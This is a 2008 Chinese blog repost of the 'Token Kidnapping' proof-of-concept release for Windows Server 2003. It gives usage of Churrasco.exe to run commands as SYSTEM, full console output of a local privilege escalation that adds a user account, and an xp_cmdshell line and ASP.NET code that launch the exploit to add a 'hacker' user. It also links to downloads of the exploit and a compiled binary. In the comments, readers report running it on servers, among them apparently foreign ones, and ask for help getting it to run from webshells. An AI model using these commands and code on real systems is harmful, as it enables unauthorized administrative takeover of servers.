酒水不犯茶水


叶的离去,是风的追求还是树的不挽留?
数据加载中……
Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)
我的有啥补丁打啥补丁的Win2k3 CN SP1测试成功
 
d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1696
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1952
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1956
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1960
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x75c
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x754
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
命令成功完成。





It has been a long time since Token Kidnapping presentation (http://
www.argeniss.com/research/TokenKidnapping.pdf) was published so I
decided to release a PoC exploit for Win2k3 that alows to execute code
under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can
own Windows, this is because Windows services accounts can
impersonate.
Other process (not services) that can impersonate are IIS 6 worker
processes so if you can run code from an ASP .NET or classic ASP web
application then you can own Windows too. If you provide shared
hosting services then I would recomend to not allow users to run this
kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want
to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.
 Posted by Cesar Cerrudo at 4:10 PM


编译版本:
http://www.blogjava.net/Files/baicker/Churrasco.rar

posted on 2008-10-09 10:52 009 阅读(4024) 评论(11)  编辑  收藏 所属分类: 网络资源黑客技术

评论

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-09 14:43 xiaomi

MS不知道为什么没有修补这个漏洞
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-09 15:20 雨夜

测试了5台成功4台半,那台断电了。
好东西啊
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-09 16:00 saint

Exploiting IIS 6 with ASP .NET环境才可以吗?
能执行命令的WEBSHELL也不多。呵呵。
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-09 17:49 网络ak48

太邪恶了。。。。。。。。 太太邪恶了。
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-10 10:42 人族

为啥我测试自己的sp1 不成功呢?如果不是cn的可以么?
提示:
/churrasco/-->Running command with SYSTEM Token
/churrasco/-->Couldn't run command, try again!

不能成功运行命令哦
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)[未登录] 2008-10-10 11:09 hh

命令不是d:\路径 \Churrasco.exe "net user admin /add"
么 我恩么老回显格式不对呢?
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-10 19:03 jjjyyy

大哥 你编译的都出错啊
http://www.jydown.cn/up/2003.jpg
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-10 21:53 深蓝T透

那个没有出错 是因为你的环境不行而已
你去2003+iis 6.0 几乎都可以成功
我测试了下韩国的 没有问题!
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)[未登录] 2008-10-12 18:00 Sin

为什么在我的webshell上执行不了? 2003+iis6的
<img src=http://www.bnec.cn/blog/data/1/netfolder/未命名.jpg>
老是提示:/churrasco/-->Usage: Churrasco.exe "command to run"
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-14 22:10 郁郁葱葱

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1012
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 1016
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1020
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1024
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x1f58
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x1f50
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Couldn't run command, try again!
  回复  更多评论    

# re: Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功) 2008-10-14 22:10 郁郁葱葱

这问这是怎么回事?
  回复  更多评论    

专题:iPad  jQuery  Chrome OS

博客园首页  IT新闻  闪存  学英语
标题  
姓名  
主页
验证码 *  
内容(请不要发表任何与政治相关的内容)  
  登录      
该文被作者在 2008-10-09 11:01 编辑过
每天10分钟,轻松学英语


网站导航:
 

2006 © 009网站 版权没有,任意拷贝
如有意见和建议,请 E-mail 至 baicker@hotmail.com
建议使用 Firefox & 微软雅黑字体进行浏览,最佳显示 1400*1050